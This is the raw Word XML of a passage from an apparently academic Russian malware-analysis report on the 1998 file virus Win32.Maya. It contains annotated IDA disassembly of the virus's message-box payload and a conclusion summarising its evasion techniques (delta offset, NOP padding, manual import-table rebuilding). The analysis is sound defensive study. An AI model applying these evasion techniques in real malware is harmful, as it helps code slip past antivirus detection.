        <w:t xml:space="preserve"> "Win32.Maya (c) 1998 The Shaitan [SLAM]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F015621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>CODE:0040191F                 add     eax, ebp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4151E3C4" w14:textId="77777777" w:rsidR="002A5B0E" w:rsidRPr="00C26132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>CODE</w:t>
      </w:r>
      <w:r w:rsidRPr="00C26132">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">:00401921                 </w:t>
      </w:r>
      <w:r w:rsidRPr="002A5B0E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>push</w:t>
      </w:r>
      <w:r w:rsidRPr="00C26132">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="002A5B0E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>eax</w:t>
      </w:r>
      <w:r w:rsidRPr="00C26132">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                      ; </w:t>
      </w:r>
      <w:r w:rsidRPr="002A5B0E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>lpText</w:t>
      </w:r>
      <w:r w:rsidRPr="00C26132">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>текст</w:t>
      </w:r>
      <w:r w:rsidRPr="00C26132">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>сообщения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9B9D62" w14:textId="77777777" w:rsidR="002A5B0E" w:rsidRDefault="002A5B0E" w:rsidP="002A5B0E">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C26132">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                               </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>; Сообщение содержит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F1A7DE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Название вируса: Win32.Maya</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C1E5D0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Год создания: 1998</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539A2132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Псевдоним создателя: The Shaitan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF863B0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- Дополнительная метка: [SLAM]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06153FB1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CODE:00401922                 push    0                        ; hWnd = NULL (окно-родитель отсутствует)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78391A3A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MessageBox будет модальным окном верхнего уровня</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B0145D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t xml:space="preserve">CODE:00401924                 mov     eax, ss:MessageBoxA_0[ebp] ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Адрес</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5B0E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>функции</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5B0E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> MessageBoxA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B09FFD7" w14:textId="77777777" w:rsidR="002A5B0E" w:rsidRPr="002A5B0E" w:rsidRDefault="002A5B0E" w:rsidP="002A5B0E">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A5B0E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CODE:0040192A                 call    eax                      ; MessageBoxA(NULL, "Win32.Maya...", "Virus Alert!", MB_ICONEXCLAMATION | MB_OK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A89C97" w14:textId="77777777" w:rsidR="002A5B0E" w:rsidRDefault="002A5B0E" w:rsidP="002A5B0E">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A5B0E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                               </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>; Отображает диалоговое окно с сообщением о вирусе</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048C439F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Окно будет отображаться поверх всех других окон</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140ADA6B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 xml:space="preserve">                                                               ; и блокировать выполнение до нажатия кнопки "OK"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6A026D" w14:textId="77777777" w:rsidR="002A5B0E" w:rsidRDefault="002A5B0E" w:rsidP="002A5B0E">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20EBFB59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CODE:0040192C locret_40192C:                                  ; Метка выхода из функции</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1816409A" w14:textId="77777777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CODE:0040192C                 retn                             ; Завершение функции Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E43EDB" w14:textId="28B9216C" w:rsidR="002A5B0E" w:rsidRDefault="002A5B0E" w:rsidP="002A5B0E">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>CODE:0040192C Payload         endp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A486EDA" w14:textId="1C07369D" w:rsidR="002A5B0E" w:rsidRDefault="002A5B0E" w:rsidP="002A5B0E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>АНАЛИЗ СООБЩЕНИЯ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D19303" w14:textId="77777777" w:rsidR="002A5B0E" w:rsidRPr="002A5B0E" w:rsidRDefault="002A5B0E" w:rsidP="002A5B0E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Сообщение</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5B0E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> "Win32.Maya (c) 1998 The Shaitan [SLAM]" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>содержит</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5B0E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E01B0A2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1. Win32.Maya - название вируса и платформа (Win32)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E208D3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2. (c) 1998 - год создания вируса и символ копирайта</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4779558D" w14:textId="77777777" w:rsidR="002A5B0E" w:rsidRDefault="002A5B0E" w:rsidP="002A5B0E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>3. The Shaitan - псевдоним создателя вируса ("Shaitan" на арабском означает "дьявол" или "сатана")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2037F1C5" w14:textId="5BC6D909" w:rsidR="002A5B0E" w:rsidRDefault="002A5B0E" w:rsidP="002A5B0E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>4. [SLAM] - дополнительная метка или версия вируса</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57230B31" w14:textId="4F7727F7" w:rsidR="002A5B0E" w:rsidRDefault="002A5B0E" w:rsidP="002A5B0E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Это типичная "подпись" создателя вируса, характерная для вирусов конца 1990-х годов, когда многие создатели вирусов оставляли подобные метки в своих творениях.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72926955" w14:textId="083CE732" w:rsidR="00D80D5C" w:rsidRDefault="00D80D5C" w:rsidP="000C7726">
      <w:pPr>
        <w:pStyle w:val="aff4"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc215414046"/>
      <w:r w:rsidRPr="000C7726">
        <w:lastRenderedPageBreak/>
        <w:t>Заключение</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="5122F95E" w14:textId="2FD323AC" w:rsidR="00372AC3" w:rsidRDefault="00372AC3" w:rsidP="00372AC3">
      <w:r>
        <w:t>Проведенный детальный анализ техник обфускации, скрытия и полезной нагрузки вируса Virus.Win32.Maya.4206 позволил получить полное представление о методах, используемых вирусом для усложнения анализа и обхода систем защиты. Результаты анализа демонстрируют, что данный вирус является типичным представителем файловых вирусов конца 1990-х годов, использующим относительно простые техники по сравнению с современным вредоносным программным обеспечением.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F729E96" w14:textId="520C4557" w:rsidR="00372AC3" w:rsidRDefault="00372AC3" w:rsidP="00372AC3">
      <w:r>
        <w:t>ОСНОВНЫЕ ТЕХНИКИ, ИСПОЛЬЗУЕМЫЕ ВИРУСОМ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3AA534" w14:textId="77777777" w:rsidR="00372AC3" w:rsidRDefault="00372AC3" w:rsidP="00372AC3">
      <w:r>
        <w:t>1. ОБФУСКАЦИЯ КОДА (ВМЕСТО УПАКОВКИ):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8DD4C1" w14:textId="77777777" w:rsidR="00372AC3" w:rsidRDefault="00372AC3" w:rsidP="00372AC3">
      <w:r>
        <w:t xml:space="preserve">   Вирус НЕ использует упаковщик, что значительно упрощает процесс анализа. Код вируса полностью виден в IDA Pro без необходимости распаковки или создания дампа процесса. Однако вирус использует несколько техник обфускации:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB12E27" w14:textId="5A6AFDC6" w:rsidR="00372AC3" w:rsidRDefault="00372AC3" w:rsidP="00372AC3">
      <w:r>
        <w:t>- Delta offset техника позволяет вирусу вычислять свой реальный адрес загрузки во время выполнения, обеспечивая независимость от адреса загрузки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC39EF5" w14:textId="610B49B5" w:rsidR="00372AC3" w:rsidRDefault="00372AC3" w:rsidP="00372AC3">
      <w:r>
        <w:t>- NOP-слайды (вставка мусорных инструкций NOP между полезными инструкциями) затрудняют создание сигнатур для антивирусных систем</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E69DE0" w14:textId="1D1DB861" w:rsidR="00372AC3" w:rsidRDefault="00372AC3" w:rsidP="00372AC3">
      <w:r>
        <w:t>- Ручное восстановление IAT позволяет вирусу обходить стандартные механизмы импорта и работать даже при поврежденной таблице импорта</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B436D53" w14:textId="77777777" w:rsidR="00372AC3" w:rsidRDefault="00372AC3" w:rsidP="00372AC3">
      <w:r>
        <w:t>2. СКРЫТИЕ ОТ ОБНАРУЖЕНИЯ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2152591E" w14:textId="2D92AC7B" w:rsidR="00372AC3" w:rsidRDefault="00372AC3" w:rsidP="00372AC3">
      <w:r>
        <w:t xml:space="preserve">   Вирус использует минимальные техники для скрытия от антивирусных систем, что характерно для вредоносного программного обеспечения конца 1990-х годов:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F31A604" w14:textId="77777777" w:rsidR="00372AC3" w:rsidRDefault="00372AC3" w:rsidP="00372AC3">
      <w:r>
        <w:t xml:space="preserve">   - Отсутствие сложных антиотладочных техник делает вирус легко анализируемым</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C8E49B" w14:textId="412978B8" w:rsidR="00372AC3" w:rsidRDefault="00372AC3" w:rsidP="00372AC3">
      <w:r>
        <w:t xml:space="preserve">   - Отсутствие техник обхода песочниц означает, что вирус будет выполняться в любой среде, включая автоматизированные системы анализа</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF6E348" w14:textId="77777777" w:rsidR="00372AC3" w:rsidRDefault="00372AC3" w:rsidP="00372AC3">
      <w:r>
        <w:t xml:space="preserve">   - Отсутствие сетевой активности означает, что вирус работает только локально</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454F172A" w14:textId="58C8E837" w:rsidR="00372AC3" w:rsidRDefault="00372AC3" w:rsidP="00372AC3">
      <w:r>
        <w:t xml:space="preserve">   - Отсутствие удаления следов означает, что вирус оставляет артефакты своей деятельности</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063870BE" w14:textId="77777777" w:rsidR="00372AC3" w:rsidRDefault="00372AC3" w:rsidP="00372AC3">
      <w:r>
        <w:t>3. ПОЛЕЗНАЯ НАГРУЗКА:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E49CB44" w14:textId="77777777" w:rsidR="00372AC3" w:rsidRDefault="00372AC3" w:rsidP="00372AC3">
      <w:r>
        <w:t xml:space="preserve">   Payload вируса является относительно простым и не деструктивным:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3007C9EB" w14:textId="77777777" w:rsidR="00372AC3" w:rsidRDefault="00372AC3" w:rsidP="00372AC3">
      <w:r>
        <w:t xml:space="preserve">   - Изменение обоев рабочего стола на SLAM.BMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DA0A86" w14:textId="77777777" w:rsidR="00372AC3" w:rsidRDefault="00372AC3" w:rsidP="00372AC3">
      <w:r>
        <w:t xml:space="preserve">   - Отображение MessageBox с информацией о вирусе</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6897CBAE" w14:textId="225C4EF4" w:rsidR="00372AC3" w:rsidRPr="00372AC3" w:rsidRDefault="00372AC3" w:rsidP="00372AC3">
      <w:r>
        <w:t xml:space="preserve">   - Отсутствие кражи данных, майнинга, распространения по сети или деструктивных действий.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224977F3" w14:textId="2AA6664A" w:rsidR="00D80D5C" w:rsidRDefault="00D80D5C" w:rsidP="005E7EC9">
      <w:pPr>
        <w:pStyle w:val="aff4"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc215414047"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Список использованных источников</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:sectPr w:rsidR="00D80D5C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C0BB" w14:textId="77777777" w:rsidR="00D56FD1" w:rsidRDefault="00D56FD1" w:rsidP="000C7726">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD4A252" w14:textId="77777777" w:rsidR="00D56FD1" w:rsidRDefault="00D56FD1" w:rsidP="000C7726"/>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6ACF3D9D" w14:textId="77777777" w:rsidR="00D56FD1" w:rsidRDefault="00D56FD1" w:rsidP="000C7726">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7BB15D" w14:textId="77777777" w:rsidR="00D56FD1" w:rsidRDefault="00D56FD1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7A9A" w14:textId="77777777" w:rsidR="00D56FD1" w:rsidRDefault="00D56FD1" w:rsidP="000C7726">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA04748" w14:textId="77777777" w:rsidR="00D56FD1" w:rsidRDefault="00D56FD1" w:rsidP="000C7726"/>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="243663C2" w14:textId="77777777" w:rsidR="00D56FD1" w:rsidRDefault="00D56FD1" w:rsidP="000C7726">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="559DD6CD" w14:textId="77777777" w:rsidR="00D56FD1" w:rsidRDefault="00D56FD1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08482E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D71023AE"/>
    <w:lvl w:ilvl="0" w:tplc="EE549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4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1267956238">
    <w:abstractNumId w:val="2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3"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="156795633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195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5B0E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2AC3"/>
    <w:rsid w:val="00374042"/>
    <w:rsid w:val="00374320"/>
    <w:rsid w:val="0037561C"/>
    <w:rsid w:val="0037674E"/>
    <w:rsid w:val="0038536E"/>
    <w:rsid w:val="0038607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6FE2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57074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D3B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5DB5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2ED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56B1C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0CEF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05B96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5690"/>
    <w:rsid w:val="00847E12"/>
    <w:rsid w:val="0085303E"/>
    <w:rsid w:val="00856943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5999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1FF2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A7C8D"/>
    <w:rsid w:val="00BB0748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5DCF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132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2BEE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56FD1"/>
    <w:rsid w:val="00D62445"/>
    <w:rsid w:val="00D630D2"/>
    <w:rsid w:val="00D630F2"/>
    <w:rsid w:val="00D641B3"/>
    <w:rsid w:val="00D642B4"/>
    <w:rsid w:val="00D65076"/>
    <w:rsid w:val="00D71040"/>
    <w:rsid w:val="00D72B3C"/>
    <w:rsid w:val="00D74C35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0D98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C6B4B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8665</Words>
  <Characters>49392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4</cp:revision>
  <cp:lastPrinted>2025-11-30T13:59:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-30T13:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-30T13:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>